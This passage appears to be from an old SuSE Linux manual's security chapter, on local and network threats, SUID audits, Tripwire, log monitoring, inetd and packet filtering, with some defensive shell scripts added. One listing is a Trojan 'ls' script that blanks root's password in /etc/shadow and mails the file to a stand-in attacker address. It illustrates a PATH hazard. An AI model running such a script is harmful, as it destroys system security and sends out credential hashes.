Part VII
Security and Getting Started
411
Chapter 18
Security is a Matter of Trust
18.1 Basics
Attacks and intruders from the Internet can no longer be ignored. Every day
one hears of some new danger to your PC at home or the entire company
network, be it from attacks from the Internet, or from viruses. But in reality
it is actually quite simple to take effective precautions against such threats.
Before we go into describing individual protection measures, it needs to be
clarified what is actually meant by the word "security", and protection against
what. The following six points will quickly make it clear that the security of
a computer is a very sensible aim.
1. Protection of your resources
2. Access to information
3. Data availability
4. Data integrity
5. Confidentiality of sensitive information
6. Privacy
A complete security solution is necessary in order to prevent someone from
taking advantage of these issues. You must not only protect your computer
from outside attacks, but also against data loss from equipment failure, such
as a hard drive crash or faulty backup tapes.
Backing up on a truly regular basis is vital. In addition, the integrity of
these backups should be checked from time to time, to make sure they are
reliable.
Your computer is at risk in the following ways:
* Users connected directly to the computers in question present the largest
of all possible risks. These risks are not always intentional, but specific attacks
through staff, of course, cannot be ruled out.
* Communication links via both local and worldwide networks can be
scanned using sniffers and other hacker tools. Open communication
links make your computer vulnerable to a break-in, even from another
part of the world.
* Direct access to your computer: it can be stolen, sabotaged or damaged by
someone untrustworthy.
* Natural disasters: computers are very prone to natural catastrophes.
* Hardware and software can be faulty, through design or concrete defects,
thus not only threatening data, but also compromising security, and
possibly making the service completely unusable (see also Section 91
page 418).
* Loss of storage media: floppy disks, streamer tapes and hard drives can be
damaged, lost or stolen.
* Electromagnetic radiation is emitted by your computer, monitor and even
network cables. Sophisticated surveillance equipment can use this to
monitor activity on your computer. This radiation is also carried through
conduits and power cables, and, contrary to popular opinion, LCD monitors
also give off radiation.
We want to concentrate here on the first two points, because a well-thought-out
use of SuSE Linux can, to a large extent, remove potential dangers. The
other points are probably of less interest to a private user of SuSE Linux, but
if a company network is being set up, those involved need to take these points
into consideration.
In Section 18.1.1 and Section 18.1.2 page 417 we first point out the different
types of attacks which exist. Later, in Section 18.2 page 418, we describe the
relevant security tools in detail. Finally, at the end of the chapter, we outline
some important general guidelines.
18.1.1 Local Security
He who sits in a glass house . . . If you want to secure your data, you should
begin with your personal computer. Even if your computer is not connected
or only connected via dialup to the Internet, you should take certain security
precautions. To have your hard drive erased accidentally by a party guest can
be a pain. Even more so if it contains the only copy of your dissertation.
Passwords
As Linux is a multiuser operating system, it offers not only a means for
administering users but also a complete authentication mechanism. Although
it may not seem necessary at first, be sure to enter a password for every user on
your computer [1]. This provides positive protection for your computer against
intruders. You should take special care to give the user `root' a good
password, because getting hold of the `root' password is one of the main
targets for crackers.
However, as long as others have physical access to your computer, the best
password in the world is of no use. Any person who can boot your computer
can attack it using a boot disk. For this reason, you should disable the floppy
as a boot device in your BIOS setup.
For this to be of any use, you will need to set a password for the BIOS. Do
not forget this password! Without it, you will not be able to access your
own BIOS, unless the BIOS is reset by means of a jumper setting.
[1] Many references discuss this. In Section 18.4 page 426, we give you some practical advice.
If you use LILO (see Section 26 page 113) you should set the option
restricted together with a password (e. g. password=secure password)
in /etc/lilo.conf. Otherwise it is possible for anyone sitting directly at
the computer to compromise the system's security. Obviously the password
must be chosen carefully, and /etc/lilo.conf should only have read
permissions for `root'.
The package john in series sec (Security-related Software) contains a
program which tries to "guess" passwords. A good system administrator can use
this to automatically root out weak passwords, and then request users to only
use safe passwords.
Permissions
All users should work in a reduced permissions environment in order to be
sure they do not harm your system, whether deliberately or not. Furthermore,
you should avoid, as far as possible, working as user `root'. And you
should be the only person who knows the `root' password.
Buffer Overruns
Forcing buffer overruns is one of the most popular methods crackers use to
get `root' permissions on a computer. Also known as "stack smashing
vulnerabilities", these exploits overwrite static entries in a program's user
stack (e. g., while entering text) with a value that launches a command, such
as invoking a shell. This is possible in programs which have static array
dimensions and which don't check for buffer overrun.
The only vulnerable programs are those with the SUID bit set. These are
programs that are executed using the UID of the owner instead of the user.
Normally programs such as passwd use SUID because they perform tasks
not allowed to a normal user. For this reason, we have taken steps to minimize
the number of SUID programs in SuSE Linux as well as introducing further
measures to protect these programs from attack. You should also monitor the
relevant media and, when such loopholes are announced, obtain
the available updates and patches as soon as possible.
Another form of attack on privileged programs and running services are so-called
"link attacks". Through programs working carelessly in public directories,
it can be possible to divert data to totally different files, thus compromising
the security of the system, or even bringing it down.
In order to reduce the number of SUID and SGID files in the system, in
SuSE Linux, you can, with YaST, in System Administration and
Security Settings change the settings to secure or paranoid in
the selection window file permissions changed to:. The permissions
set by these can be seen in the files /etc/permissions.secure
and /etc/permissions.paranoid. Before you use paranoid, however,
you should ensure that the functionality of the system is not too
restricted for your own requirements. Because of its complexity and its huge
amount of code, the X Window System (XFree86) has, on a number of
occasions, attracted adverse attention. This problem has now been defused in
SuSE Linux because the server and libraries are no longer set with SUID
`root'. Under certain conditions, however, there can be a number of
drawbacks in the client-server communication. It is possible, for example, to
intercept keyboard input, or to read window contents. By observing rule 3 and
using Xauthority (command xauth), as well as avoiding xhost +, a high
level of security can be achieved.
Where possible, to start remote X-programs, package ssh in series n (Network)
should be used. If you plan to use ssh commercially, please look at the
licenses in /usr/doc/packages/ssh/COPYING. ssh is available for
almost any platform. However, this so-called X11 forwarding also contains
its own concealed risks, so you should consider not using it at all.
For reasons of performance alone, the X Window System should never be
installed on critical servers (i.e. file servers, ftp servers, routers, etc.).
Viruses and Trojan Horses
Until relatively recently, various types of viruses did their mischievous deeds,
and not just on home computers, because copying and transporting software
by floppy disks represented the ideal feeding ground for such programs.
Fortunately, only two viruses for Linux have been discovered until now. Because
software for Linux is hardly ever passed on in binary form, and since SuSE
Linux itself can be considered virus free, there is no threat from viruses,
providing you abide by rule 1, on page 426.
It is a different matter, however, for the still increasingly seen macro viruses,
often sent by electronic mail (embedded in word processing documents).
Since there is no Linux version of Microsoft Office, these can do no damage
to SuSE Linux itself. The fact that SuSE Linux is increasingly used on
mail servers as a "Mail Transfer Agent" offers an ideal opportunity to scan
incoming and outgoing mails automatically for embedded viruses.
"Trojan horses" are completely different from viruses. These are programs
which claim to do one thing, but do some evil deed as well. For example, a
shell login Trojan horse might collect user names and passwords in a file, and
send this information on as e-mail. This may sound quite harmless, but it's
no joke if credit card numbers or the PIN of a bank account is involved.
The chances of loading a Trojan horse from the Internet or receiving one by
e-mail are pretty slim. It is, however, standard practice to leave behind some
Trojans on an already compromised system, in order to be able to access that
machine at any time. The existence of these can therefore be seen as a sure
sign of a compromised machine.
While there is no definitive protection against viruses and Trojan horses, you
can greatly reduce the likelihood of such attacks by installing a good virus
scanner, and copying both floppy disks and programs with great care. In
addition, please see Section 18.4 page 426. Programs such as tripwire
(package tripwire, series sec (Security relevant software), see
Section 92 page 419) are useful in identifying these.
18.1.2 Network Security
Most computers these days no longer exist on their own ("standalone"). As
Linux offers all the necessary capabilities, most Linux computers are on a
LAN and may just as easily be connected to the Internet via a modem. Linux
computers are also frequently used as gateways for complex subnets. These
factors provide many avenues of attack from the network.
You may avoid most of these attacks by setting up a firewall. The ports in
use will still be vulnerable, but they may be protected, using the appropriate
tools.
The potential for being attacked during the 30 minutes each day you read your
e-mail while connected to the Internet via dialup modem may be neglected.
Systems which use leased lines, however, should be protected. Below, we
describe the most important forms of attack.
Man in the Middle
"Man in the middle" attacks refer to a network that is routed via one or
more hosts. The intruder takes control of one of the routers, and can sniff
IP packets, redirect and replace them. As routers currently do not require
authentication, it is quite easy to do this. This will change when the new IPv6
protocol standard comes into force.
The only protection against this kind of attack is a good set of cryptographic
tools. These attacks occur mainly while accessing WWW sites or while
exchanging mail. You should never use commands such as telnet and
rsh, as they send an unencrypted password over the network. This allows
devious hackers to read them! Switch to ssh to avoid this. E-mail can be
encrypted using pgp. Even HTTP pages can be encrypted, using the SSL [2]
protocol. This protocol is used with package apache in series n (Network).
The quality of the encryption is only as good as the secure transmission of the
key. So you should take special care when doing this!
Buffer Overflows, Part 2
After so-called "sniffing", the passive reading of data (such as login and
password), buffer overflows are the most frequent kind of security compromise
from the outside. The rule here is: every service accessible externally (e. g.
mail, webserver, POP3, etc.) represents a potential security problem. All
services which are absolutely essential and cannot be switched off should,
wherever possible, only be accessible by certain systems, via a firewall
configuration of the Linux kernel (by means of ipchains). If this is not
possible you should try to replace the service with an especially secure version
(e. g. package postfix instead of package sendmail). In addition to this,
experts can run every service in its own chroot environment.
[2] SSL stands for Secure Socket Layer
Denial of Service
Denial of service attacks attempt to overload a network service. Under
certain conditions, not only the specific service attacked but the computer under
attack as well, may no longer be reached. After the attack, the network packet
which initiated it will often have been moved somewhere else. Denial
of service is often used together with IP spoofing (see below) to conceal the
source of the attack. Tracing the attacker is almost impossible. You need an
effective means of protection.
When denial of service attacks are discovered, a patch protecting against it
will usually be available for download over the Internet within hours. SuSE
Linux has been patched to protect against every denial of service attack
known, up to the time of pressing the CD. The administrator must remain
informed at all times about both attacks and available patches.
IP spoofing
IP spoofing makes use of a security hole in the TCP/IP protocol: it doesn't
check the return address. Thus, this address may be changed to cover the
cracker's origin of attack.
It is important to configure your router to require an external network
connection. Only packets containing an external address should be routed to the
internal network, and packets with an internal address, to the external
network. It should be the responsibility of each ISP to configure their routers
properly so that invalid packets will not be routed.
18.2 Tools
Let's take a look at the tools available for maintaining your system and check-
ing for potential weak points. We would like to remind you at this point that
the potential threat to a computer varies in each individual case. In a network
protected by a firewall, it is clear that less protection and monitoring measures
are needed than in an unprotected network.
18.2.1 Local Tools
Two great advantages of Linux over other operating systems are its stability
and the fact that it is a multiuser system. However, the latter entails risks
which should not be underestimated. In addition to the known permissions,
there are certain parameters which can be exploited by the advanced user.
Specifically, we mean the SUID bit. A program with this set automatically
has the permissions of the user to whom it belongs. If the said program
belongs to the superuser, and is started by any user, then it has the rights
of the superuser on the running system. This might sound dangerous but
this is normally not the case. In fact there are several programs that rely on
this capability. The command ping, for example, needs to be executed as
superuser. This would mean that only user `root' would be allowed to
execute this program. To avoid this, the SUID bit is set.
newbie@earth:/home/newbie > ls -l /bin/ping
-rwsr-xr-x 1 root root 13216 Mar 17 16:36 /bin/ping
If you would like to know the programs that have the SUID bit set and belong
to user `root', enter the following command:
newbie@earth:/home/newbie > find / -uid 0 -perm +4000
This is one way of detecting "suspicious" programs. YaST enables you to set
`Permissions will be set to:' (in `System administration'
and `Security settings') to secure. The files which are affected
by this can be seen in /etc/permissions.secure.
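The find command above lists the privileged programs once; what you want to know over time is whether that list has changed. As an added example in shell (not from the manual), the script below compares the set-UID/set-GID files under a tree with an approved list and reports deviations; the tree, file names and baseline are constructed so that it runs without root, and on a real system you would run it on / with the -uid 0 filter.

```shell
#!/bin/sh
# Added example (not from the SuSE manual): audit set-UID/set-GID files against
# an approved baseline. On a real system TREE would be / and you would add
# "-uid 0" to the find command, exactly as the manual does; the demo tree and
# its baseline below are constructed so the script runs without root rights.

# list_suid TREE: print "mode owner path" for every regular file below TREE
# that carries the set-UID (4000) or set-GID (2000) bit, sorted by path.
list_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort |
    while IFS= read -r f; do
        # ls -ld is portable; field 1 is the mode string, field 3 the owner
        set -- $(ls -ld "$f")
        printf '%s %s %s\n' "$1" "$3" "$f"
    done
}

# check_suid TREE BASELINE: compare the privileged files found below TREE with
# the approved list in BASELINE (one absolute path per line) and print one line
# per deviation: "NEW path" for an unapproved privileged file (the interesting
# case after a break-in) and "MISSING path" for an approved one that is gone.
check_suid() {
    cur=$(mktemp); base=$(mktemp)
    list_suid "$1" | awk '{ print $3 }' | sort > "$cur"
    sort "$2" > "$base"
    comm -13 "$base" "$cur" | sed 's/^/NEW /'       # only in current set
    comm -23 "$base" "$cur" | sed 's/^/MISSING /'   # only in baseline
    rm -f "$cur" "$base"
}

# make_demo_tree: build a constructed sample tree (ping and su with set-UID,
# wall with set-GID, vi without either) plus a baseline that approves ping and
# su and still lists an "old" program that no longer exists. Prints the path.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/usr/bin"
    : > "$d/bin/ping";     chmod 4755 "$d/bin/ping"
    : > "$d/bin/su";       chmod 4755 "$d/bin/su"
    : > "$d/usr/bin/wall"; chmod 2755 "$d/usr/bin/wall"
    : > "$d/usr/bin/vi";   chmod 0755 "$d/usr/bin/vi"
    printf '%s\n' "$d/bin/ping" "$d/bin/su" "$d/usr/bin/old" > "$d/baseline"
    printf '%s\n' "$d"
}

# Stand-alone run: report deviations for the demo tree.
demo=$(make_demo_tree)
check_suid "$demo" "$demo/baseline"
rm -rf "$demo"
```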
No one has the time to monitor his computer all the time. Fortunately there
are tools to help you perform this tedious task. One of these tools deserves
special mention, recommended as it is by CERT [3]. This is the tripwire package
in package tripwire, series n (Network).
Tripwire
Tripwire is easy to understand. It checks the system and saves the states and
necessary information in a database. You can specify the files which are to be
checked in a configuration file.
Tripwire doesn't check for infected files or system errors. It assumes that it
is installed on a clean system. This is why it should be installed directly after
the system has been set up and before it is connected to the network. You
create the database as follows:
root@earth:root > /var/adm/tripwire/bin/tripwire -init
The paths to the database and configuration files, as they have been compiled
into package tripwire on SuSE Linux are shown in Table 18.1.
Table 18.1: Tripwire
/var/adm/tripwire    Database and configuration file
The paths are chosen such that only the superuser (`root') may change
to the Tripwire home directory. Ideally the database should be on a read-
only filesystem (e. g., a write protected floppy disk), otherwise a successful
attacker could cover his tracks by manipulating the database. An example
configuration file for Tripwire may be found in /usr/doc/packages/
tripwire/tw.conf.example.linux. Help on the syntax of Tripwire
may be found in the corresponding manpage tw.config. You may apply
different checksum methods to different files and directories. After you have
set up your configuration file, you may run tripwire regularly, for example, as
a cron job.
[3] CERT = Computer Emergency Response Team; see http://www.cert.dfn.de/dfncert/info.html.
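To show what Tripwire's init and check steps do, here is an added example in shell (not Tripwire's own code) that records a checksum for every file below a tree and later reports added, changed and removed files; the directory, the file contents and the use of cksum in place of a cryptographic digest are assumptions of the example.

```shell
#!/bin/sh
# Added example (not Tripwire itself): the idea behind Tripwire in a few
# lines of shell. integrity_init records a checksum for every file below a
# tree; integrity_check later compares the tree against that record. POSIX
# cksum (a CRC) is used only because it exists everywhere; Tripwire uses
# cryptographic digests, and the database must live where an intruder cannot
# rewrite it (the manual suggests a write-protected floppy).

# integrity_init TREE DB: write "crc size path" for every regular file below
# TREE into DB. DB must not lie inside TREE, or it would record itself.
integrity_init() {
    find "$1" -type f -print | sort | while IFS= read -r f; do
        cksum "$f"
    done > "$2"
}

# integrity_check TREE DB: print one line per deviation, sorted:
#   ADDED path    - file exists now but was not recorded
#   CHANGED path  - recorded file whose checksum or size differs
#   REMOVED path  - recorded file that no longer exists
# Prints nothing when the tree still matches the database.
integrity_check() {
    now=$(mktemp)
    integrity_init "$1" "$now"
    awk '
        # first input file is the stored database: remember crc+size per path
        FILENAME == ARGV[1] { old[$3] = $1 " " $2; next }
        # second input file is the current state
        {
            if ($3 in old) {
                if (old[$3] != $1 " " $2) print "CHANGED " $3
                delete old[$3]
            } else {
                print "ADDED " $3
            }
        }
        END { for (p in old) print "REMOVED " p }
    ' "$2" "$now" | sort
    rm -f "$now"
}

# Stand-alone run on a constructed sample tree: take the baseline, then
# modify one file, add one and delete one, and show what the check reports.
demo=$(mktemp -d); db=$(mktemp)
mkdir "$demo/etc"
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$demo/etc/passwd"
printf 'root:!:10957:0:99999:7:::\n'      > "$demo/etc/shadow"
printf '127.0.0.1 localhost\n'            > "$demo/etc/hosts"
integrity_init "$demo" "$db"
printf 'guest:x:1001:100::/home/guest:/bin/sh\n' >> "$demo/etc/passwd"  # changed
printf 'Welcome\n' > "$demo/etc/motd"                                   # added
rm "$demo/etc/hosts"                                                    # removed
integrity_check "$demo" "$db"
rm -rf "$demo" "$db"
```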
SuSE Security Tools
SuSE Linux now has four specially developed security programs to help you
make your system more secure, and help you in controlling this:
The package firewall, series sec (Security-related Software) contains the
script /usr/sbin/SuSEfirewall, which reads the configuration file
/etc/rc.firewall and then generates restrictive filter lists by means of
the program ipchains. More information can be found in Section 18.2.2 on
the facing page, Network Tools.
The package secchk, series sec (Security-related Software) contains a
number of small scripts which make special safety checks on the system on a
daily, weekly and monthly basis (such as the consistency of the password file,
user files, breaking passwords, modules which are running), and if changes
have been made, the administrator is informed.
The package hardsuse, series sec (Security-related Software) contains
the perl script /usr/sbin/harden_suse, which was developed to provide system
administrators with a simple-to-use program to increase security. When it
is started, nine yes/no questions are asked (for example, should all services
be deactivated, user security increased, or SUID and SGID files minimized?),
and according to the answers given, the system is then re-configured.
You can find a log file with the changes in /etc/harden_suse.log, and
backup copies of the modified files are also created. If the system
subsequently does not perform as expected, the changes can be undone, using the
script /etc/security/undo_harden_suse.pl.
The package scslog, series sec (Security related software) contains a
kernel module which, when it has been loaded (you can automate this by adding
it to the startup files, for example), will log all incoming and outgoing
network connections.
The package secumod, series sec (Security related software) contains a
further module which prevents, or makes it difficult for, attacks to be made on
your system. Up until now, this includes protection from symlink, hard link
and pipe attacks; processes can, if desired, be prevented from being traced
with strace, and more besides. Because this package is still very new and was not
completely documented at the time of the handbook going to press, we would
like to ask you to have a look at the documentation of the package.
Further tools are already being prepared.
Surfing the Log Files
The log files are a very important resource for gathering information about
your system. These are files where programs leave a record of their work.
At least one of them, /var/log/messages, should be checked regularly.
Most of the logs in SuSE Linux are configured to write to this file.
Normally you don't have the time to browse this huge file. Luckily there are
tools which make it easier to read these log files. One of these is the program
logsurfer, which continually checks log files according to directions in a
configuration file. You may attach commands to certain occurrences in the log
files. For example, if the word "fail" occurs, you may want to be informed via
e-mail. logsurfer is a way to do this. logsurfer comes with an excellent
manpage, see the manpage for logsurfer.conf (man 4 logsurfer.conf).
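As an added example of the kind of rule logsurfer applies (not logsurfer itself), the script below counts messages containing "fail" per source host over constructed /var/log/messages lines and reports the hosts that reach a threshold, which is the point at which you would have logsurfer mail the administrator.

```shell
#!/bin/sh
# Added example (not logsurfer itself): the rule the text describes, "if the
# word fail occurs, tell the administrator", applied to syslog lines.
# report_failed_logins counts failure messages per source host and reports
# the hosts at or above a threshold; the log lines below are constructed in
# the format SuSE Linux wrote to /var/log/messages at the time.

# report_failed_logins LOGFILE THRESHOLD: print "host count" (sorted by host)
# for every source host with at least THRESHOLD messages containing "fail".
# The source is the word after "FROM"/"from"; messages without one are
# counted under "unknown".
report_failed_logins() {
    awk -v limit="$2" '
        tolower($0) ~ /fail/ {
            src = "unknown"
            for (i = 1; i < NF; i++)
                if (tolower($i) == "from") { src = $(i + 1); break }
            n[src]++
        }
        END { for (h in n) if (n[h] >= limit) print h, n[h] }
    ' "$1" | sort
}

# make_demo_log: write constructed sample lines to a temporary file and print
# its name. Three failed console/telnet logins from one address, one failed
# ssh password from another, and two harmless lines.
make_demo_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Mar 11 10:02:17 earth login[812]: FAILED LOGIN 1 FROM 192.168.3.77 FOR root, Authentication failure
Mar 11 10:02:25 earth login[812]: FAILED LOGIN 2 FROM 192.168.3.77 FOR root, Authentication failure
Mar 11 10:02:31 earth login[812]: FAILED LOGIN 3 FROM 192.168.3.77 FOR root, Authentication failure
Mar 11 10:05:02 earth sshd[900]: Failed password for newbie from 192.168.3.5 port 1025 ssh2
Mar 11 10:06:40 earth in.telnetd[933]: connect from 192.168.3.77
Mar 11 10:07:01 earth /USR/SBIN/CRON[950]: (root) CMD (run-parts /etc/cron.hourly)
EOF
    printf '%s\n' "$f"
}

# Stand-alone run: hosts with three or more failures, the case where you would
# want logsurfer to send mail to the administrator.
log=$(make_demo_log)
report_failed_logins "$log" 3
rm -f "$log"
```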
The PATH Variable and User `Root'...
You may have noticed while working with SuSE Linux that the current
directory is excluded from the search path of `root'. This is why when you are
`root', you have to add the prefix ./ to launch commands from the current
directory. The reason that SuSE Linux is configured this way is illustrated in
the example below:
* Suppose there is a user working on your system who creates the script in
File contents 18.2.1.
#!/bin/sh
cat /etc/shadow | \
sed 's;\( root:\)[ :]*\(:.*\);\1\2;' > /etc/shadow
mailx hacker@@hackit.org -s "Root Account hacked" < /etc/shadow
ls $*
File contents 18.2.1: Shell script to hack root account
* This script is then moved to /tmp/ls.
* Now, if `root' changes to /tmp, even though he has the actual path in
his PATH environment variable, `root' will not launch /bin/ls, but
our little script in /tmp/ls instead. The result of executing this script is
that the `root' password is removed. Even worse, the script also sends
the user who wrote it an e-mail, informing him that the password has been
removed. Now, he may freely log in as user `root'. The consequences
may be very unpleasant ;-) .
If the current directory were not in the search path, this could only have
happened if you had explicitly typed ./ls. This, by the way, is an example
of a Trojan horse, as described above (see Section 90 page 416).
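A check for the conditions that make the /tmp/ls trick possible, as an added shell example that is not part of the manual: it walks a PATH value and warns about empty elements, ".", relative entries, missing directories and world-writable directories without the sticky bit; the PATH value and directories used at the end are constructed.

```shell
#!/bin/sh
# Added example (not part of the manual): check a PATH value for the hazards
# behind the /tmp/ls story above. An empty element or "." lets a command be
# picked up from whatever directory root happens to be in; a relative element
# depends on the current directory in the same way; a world-writable directory
# without the sticky bit lets any user drop a replacement command there.

# check_path PATHVALUE: print one warning line per dangerous element, in PATH
# order; prints nothing for a clean PATH.
check_path() {
    # tr turns the colon-separated value into one element per line; an empty
    # line is an empty element (leading, trailing or doubled colon).
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r dir; do
        case "$dir" in
            "")  echo "EMPTY-ENTRY (means current directory)" ;;
            .)   echo "CURRENT-DIR ." ;;
            /*)  if [ -d "$dir" ]; then
                     # characters 9-10 of the mode string: "other" write and
                     # execute/sticky, e.g. "wx" for 0777, "wt" for 1777
                     case "$(ls -ld "$dir" | cut -c9-10)" in
                         w[-x]) echo "WORLD-WRITABLE $dir" ;;
                     esac
                 else
                     echo "MISSING $dir"
                 fi ;;
            *)   echo "RELATIVE $dir" ;;
        esac
    done
}

# Stand-alone run on a constructed PATH: a private directory (fine), ".", a
# relative entry, an empty entry, a world-writable directory and a missing one.
safe=$(mktemp -d); open=$(mktemp -d); chmod 777 "$open"
check_path "$safe:.:bin::$open:/no/such/dir"
rm -rf "$safe" "$open"
```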
18.2.2 Networking Tools
It is instructive to observe a host that is connected to a network. Below, we
want to point out how you can protect your Linux computer from attacks
through the network.
inetd
An elementary approach to this is a carefully thought out switching of the
ports which inetd (Internet "Super Server") makes available. In SuSE Linux,
some of the "vulnerable" services are normally disabled by default. These
include the so-called "internal services" of inetd. The configuration file is
/etc/inetd.conf. But other services as well should be enabled or disabled
with care, according to requirements. We recommend that you take a
look at the configuration files, since, for example, POP3 and other services
are enabled by default! A list of services that are completely sufficient for
nearly all cases is shown in File contents 18.2.2.
ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -w
ident stream tcp wait nobody /usr/sbin/in.identd in.identd \
-w -e -t120
File contents 18.2.2: Example configuration for inetd
Think hard about whether you really need services such as telnet, shell and
login. The disadvantage of each of these services is that passwords are
transmitted without encryption. Reading these passwords is not difficult. There
are tools which make this kind of attack trivially easy.
Never, under any circumstances, allow remote `root' access! Once again,
we direct your attention to the "Secure Shell" (package ssh). It encrypts
everything, even the password.
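An added shell example (not from the manual) that reads an inetd.conf in the format of File contents 18.2.2, lists the enabled services and flags those that send passwords in the clear or are started without tcpd; the sample configuration file is constructed and adds a commented-out line and an enabled POP3 server to the manual's lines.

```shell
#!/bin/sh
# Added example (not from the manual): a quick audit of /etc/inetd.conf that
# lists the services actually enabled and flags the two points the text makes:
# services whose passwords cross the network unencrypted, and services that
# inetd starts directly instead of through tcpd (column six), so that the
# hosts.allow/hosts.deny access control does not apply to them.

# inetd_enabled FILE: print the name (column one) of every enabled service.
# Comment lines, blank lines and backslash continuation lines are skipped.
inetd_enabled() {
    awk '
        /^[ \t]*#/ || NF < 6 { next }
        { print $1 }
    ' "$1"
}

# inetd_audit FILE: print "CLEARTEXT-PASSWORD svc" for services that transmit
# the login password in the clear, and "NO-TCPD svc" for services not wrapped
# by tcpd. Both may apply to the same service.
inetd_audit() {
    awk '
        /^[ \t]*#/ || NF < 6 { next }
        {
            if ($1 ~ /^(ftp|telnet|shell|login|exec|pop3|pop-3|imap|imap2)$/)
                print "CLEARTEXT-PASSWORD", $1
            if ($6 !~ /tcpd$/)
                print "NO-TCPD", $1
        }
    ' "$1"
}

# make_demo_conf: write a constructed inetd.conf to a temporary file and print
# its name. It contains the manual's sample lines, a commented-out service and
# one enabled POP3 server.
make_demo_conf() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample /etc/inetd.conf
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  wu.ftpd -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
shell   stream  tcp  nowait  root    /usr/sbin/tcpd  in.rshd -L
login   stream  tcp  nowait  root    /usr/sbin/tcpd  in.rlogind
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd -w
ident   stream  tcp  wait    nobody  /usr/sbin/in.identd  in.identd \
        -w -e -t120
# time   stream  tcp  nowait  root    internal
pop3    stream  tcp  nowait  root    /usr/sbin/tcpd  popper -s
EOF
    printf '%s\n' "$f"
}

# Stand-alone run.
conf=$(make_demo_conf)
echo "enabled: $(inetd_enabled "$conf" | tr '\n' ' ')"
inetd_audit "$conf"
rm -f "$conf"
```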
Questions on the SuSE Packet Filter Firewall cannot be answered by in-
stallation support.
The SuSE Packet Filter Firewall (package firewall, series sec (Security-related
Software)) is activated and configured by the file /etc/rc.firewall.
Individual entries are documented and commented in the file
itself. In order to help first-time users as well into the intricacies of firewalls,
here are some basic explanations and hints on using the SuSE Packet Filter
Firewall.
The family of protocols used for communication via the Internet is the In-
ternet protocol known as "TCP/IP". TCP/IP stands for Transmission Control
Protocol and Internet Protocol. TCP/IP is nowadays available on almost all
hardware, operating systems and network platforms. It was developed by the
United States Department of Defence (DoD) and presented to the public for
the first time in 1978.
A TCP/IP network transports data between computer systems by turning
the data into packets, and sending these packets. Each packet begins with
a header containing various control information, such as the address of the
target computer. This header is then followed by the data to be transmitted.
If, for example, a file is to be transported to another computer via the network,
the contents of this file are transformed into a series of packets. These packets
are then sent to the target computer.
The error-free transmission of the packets is guaranteed by the Transmission
Control Protocol (TCP). It ensures that the packets arrive in the right order.
TCP provides the transport layer and announces errors which cannot be
corrected to the next-higher IP layer. A further transport protocol of the family
is UDP. With UDP, there is no guarantee of error-free transmission, making
transmission faster than with TCP. This means, however, that when using
UDP you must check in other ways (through the application) that transmission
errors are detected and corrected.
An IP address (IP version 4) is a 32-bit value. To make IP addresses more
readable they are written in 8-bit portions, separated by dots (e. g. 192.168.0.20).
In order for a computer to maintain a number of connections simultaneously,
and for it to be able to keep these connections separate from each other,
the communication takes place via so-called ports (0 to 65535). Different
connections are assigned to these ports, that is, in the header of a TCP or
UDP packet the source and target ports of the sending computer (source
address) and the receiving computer (target address) are entered, together
with the addresses of the computers themselves. A number of the ports from
0 to 65535 are reserved for specific services (see also /etc/services).
The TCP port 23 is, for instance, the port for telnet connections. A further
specification concerns ports 0 to 1023 (TCP and UDP). They are the so-called
privileged ports. Only trustworthy programs, which sometimes need to be
carried out with system administrator privileges, can offer their services on
these ports (see /etc/services).
The ports 1024 to 65535 are referred to as non-privileged ports. The difference
can be illustrated with the somewhat simplified example of a file transfer with
ftp. An FTP server provides its services on TCP port 21. If an FTP client
on the computer with the IP address 192.168.3.5 (client) is started with
the command
newbie@earth:/home/newbie > ftp 192.168.3.16
then the client creates a TCP connection to port 21 of the computer with the
IP address 192.168.3.16 (Server). On port 21 the FTP server answers
and processes the user identification (login name and password query). The
FTP commands which the user enters after logging in are also transmitted
via this connection. If data is to be transferred from the server to the client,
(after entering the command ls or get) the server independently creates
a connection to a non-privileged port of the client. The actual data is then
transmitted via this connection.
TCP/IP was designed for very large networks, and for this reason contains
mechanisms for structuring a network. The entire 32-bit wide address space
can be divided into "subnets". A subnet is formed by a number of bits being
defined (beginning from the left) as the net address of a subnet. For the subnet
with the address 192.168.3.0, the first 24 bits of the address form the
network address. Through the "subnetmask" (network mask) it is defined
how many bits of an address form the network address. The subnetmask
255.255.255.0 for example, specifies that the computer with the address
192.168.3.5 can be found in the subnet with the address 192.168.3.0.
Subnets within a large network are usually connected by routers. Routers
are either specialised machines or computers which are sufficiently well
equipped, and which ensure that packets find the correct path to their
destination. The counteracting role to the subnet mask is performed by the so-called
broadcast address. Via the broadcast address, all computers of a subnet are
reachable. Example: all computers in the network 192.168.3.0 can be
reached via the broadcast address 192.168.3.255. If a connection to the
Internet has been made then the computer is part of the worldwide Internet.
Each time a connection to the provider is activated, that computer is reachable
from the Internet. Now you need to take steps to prevent unauthorized access
from the Internet. This task is taken on by the SuSE Packet Filter Firewall.
Packet filters are network level firewalls. They make fundamental deci-
sions on the basis of source addresses, target addresses and ports in spe-
cific IP packets. A simple router or the SuSE Packet Filter Firewall are
traditional network level firewalls. Since they are not intelligent enough to
determine what significance the contents of an IP packet have and where
it really originates from, they do not offer sufficient protection against
attacks. Modern network level firewalls (for example, SINUS Firewall
I for Linux, http://www.sinus-firewall.org) are more highly
developed, and gather internal information on the status of connections
which run via them, the contents of data streams, etc. Application level
firewalls (e. g. TIS Firewall Toolkit) on the other hand, are usually computers
on which proxy servers run and which carefully log and examine
the data traffic running over them. Since the proxy servers are programs
which run on the firewall, they are ideally suited for logging and access
protection mechanisms.
Where should the SuSE Packet Filter Firewall be used? For networks
with an increased need for protection (strictly speaking, anywhere where
personal information is stored), application level firewalls are still the first
port of call, due to the way they function. For such networks the SuSE Packet
Filter Firewall does not provide sufficient protection.
The SuSE Packet Filter Firewall is intended for protecting a private PC, a
mini-network at home or a workstation within a trusted network.
You should only use the SuSE Packet Filter Firewall to protect company
